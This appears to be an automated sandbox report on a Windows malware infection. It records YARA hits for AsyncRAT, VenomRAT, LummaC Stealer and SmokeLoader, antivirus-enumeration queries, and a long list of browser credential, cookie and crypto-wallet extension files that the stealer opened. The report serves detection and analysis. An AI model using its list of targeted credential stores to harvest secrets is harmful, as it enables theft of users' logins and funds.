Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedLumma\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedLumma\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Code function: 19_2_6C8E87EE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

19_2_6C8E87EE

Source: C:\Users\user\AppData\Local\Temp\2D42.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: Process Memory Space: vm.exe PID: 2484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vm.exe PID: 2004, type: MEMORYSTR

Source: vm.exe, 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: MSASCui.exe
Source: lm.exe, 00000014.00000003.2839163970.000000000054E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: vm.exe, 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: procexp.exe
Source: lm.exe, 00000014.00000003.2840894062.0000000003119000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2884414259.000000000311A000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2851808320.0000000003117000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2836416344.0000000003117000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: vm.exe, 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Go Injector

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 9.2.EF14.exe.7ff71bc40000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.EF14.exe.7ff71bc40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2570610433.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.2414575122.00007FF71C180000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EF14.exe PID: 3868, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\EF14.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 1988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lm.exe PID: 5724, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "%appdata%\\Electrum\\wallets","m":["*"]$sJ
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "*"],"z":"Wallets/ElectronCash","d":0,"f
Source: EF14.exe	String found in binary or memory: 61azMCvCJTGgpqseAkDulivzcEIzbUh6GMdTZAHnf1fdOpeVIX1cvVM4A8eZYfeoEwKiaYuvGzYIFP83bjKF7m6bj2wJAxxEhOliTXiwSEw/wKfyExx0wSCYqAXlH96eBExAmJxHEi07ZRDCnO0inYh1kTLelXIq6GhRN/GAUttG+NG6k9KosqFAP0KhGV9rw2I72LM/52rDcmE4tf+MyZ2GCqyJk4LOJJPPBz+M/3bNhSXwcNXMQCxo38kKghYrUGlK
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003385000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.000000000335E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.0000000003377000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: BitLockerToGo.exe, 00000010.00000003.2639948784.000000000335E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 2D42.exe, 0000000A.00000002.2847339987.00007FFD9BD10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
